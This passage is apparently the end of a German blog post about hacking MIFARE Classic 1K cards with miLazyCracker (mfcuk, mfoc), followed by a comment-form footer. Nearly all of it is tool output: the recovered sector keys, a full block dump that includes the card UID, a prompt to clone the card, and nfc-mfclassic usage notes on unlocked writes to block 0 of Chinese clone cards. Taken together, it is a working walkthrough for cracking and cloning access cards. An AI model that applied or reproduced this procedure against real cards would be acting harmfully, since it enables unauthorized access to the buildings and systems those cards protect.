 Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
 Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
 [Key: 81cc25ebbb6a] -> [....\\\\\\\\\\\.]
 [Key: 3e65e4fb65b3] -> [....xxxxxxxxxxx.]
 [Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
 [Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
 [Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
 [Key: 000000000000] -> [xxxxxxxxxxxxxxxx]
 [Key: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx]
 [Key: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx]
 [Key: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx]
 [Key: aabbccddeeff] -> [xxxxxxxxxxxxxxxx]
 [Key: 714c5c886e97] -> [xxxxxxxxxxxxxxxx]
 [Key: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx]
 [Key: a0478cc39091] -> [xxxxxxxxxxxxxxxx]
 [Key: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx]
 [Key: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx]

Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 04 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 05 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 06 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 07 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 08 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 09 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 10 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 11 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 12 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 13 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 14 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff

We have all sectors encrypted with the default keys..

Auth with all sectors succeeded, dumping keys to a file!
 Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
 Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 59, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 58, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 57, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 56, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 55, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 54, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 53, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 52, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 51, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 50, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 49, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 48, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 47, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 46, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 45, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 44, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 43, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 42, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 41, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 40, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 39, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 38, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 37, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 36, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 35, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 34, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 33, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 32, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 31, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 30, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 29, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 28, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 27, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 26, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 25, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 24, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 23, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 22, type A, key 3e65e4fb65b3 :60 ca 46 c8 a7 6b f2 8a d4 3f 28 b3 92 e2 2f 66
 Block 21, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 80
 Block 20, type A, key 3e65e4fb65b3 :10 00 40 83 00 00 00 53 00 00 00 00 00 00 00 80
 Block 19, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 18, type A, key 3e65e4fb65b3 :60 ca 46 c8 a7 6b f2 8a d4 3f 28 b3 92 e2 2f 66
 Block 17, type A, key 3e65e4fb65b3 :00 59 32 8a 5a 1e d8 fd 00 05 80 0b 00 00 00 0e
 Block 16, type A, key 3e65e4fb65b3 :10 00 40 83 00 00 00 53 00 00 00 00 5a 21 bf 44
 Block 15, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
 Block 14, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 13, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 12, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 11, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
 Block 10, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 09, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 08, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 07, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
 Block 06, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 05, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 04, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 03, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
 Block 02, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 01, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 00, type A, key ffffffffffff :04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00

Dump left in: mfc_04e8f9c2a55980_dump.mfd
 Do you want clone the card? Place card on reader now and press Y [y/n] y
 Usage: nfc-mfclassic f|r|R|w|W a|b u|U<01ab23cd> <dump.mfd> [<keys.mfd> [f]]
 f|r|R|w|W - Perform format (f) or read from (r) or unlocked read from (R) or write to (w) or unlocked write to (W) card
 *** format will reset all keys to FFFFFFFFFFFF and all data to 00 and all ACLs to default
 *** unlocked read does not require authentication and will reveal A and B keys
 *** note that unlocked write will attempt to overwrite block 0 including UID
 *** unlocking only works with special Mifare 1K cards (Chinese clones)
 a|A|b|B - Use A or B keys for action; Halt on errors (a|b) or tolerate errors (A|B)
 u|U - Use any (u) uid or supply a uid specifically as U01ab23cd.
 <dump.mfd> - MiFare Dump (MFD) used to write (card to MFD) or (MFD to card)
 <keys.mfd> - MiFare Dump (MFD) that contain the keys (optional)
 f - Force using the keyfile even if UID does not match (optional)
 Examples:

Read c nfc-mfclassic f B u dummy.mfd keyfile.mfd f

Read card to file, using key A and uid 0x01 0xab 0x23 0xcd:

nfc-mfclassic r a U01ab23cd mycard.mfd

2 Kommentare zu „miLazyCracker – Hack Mifare 1K Classic (mfcuk, mfoc)“

Kommentar verfassen

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.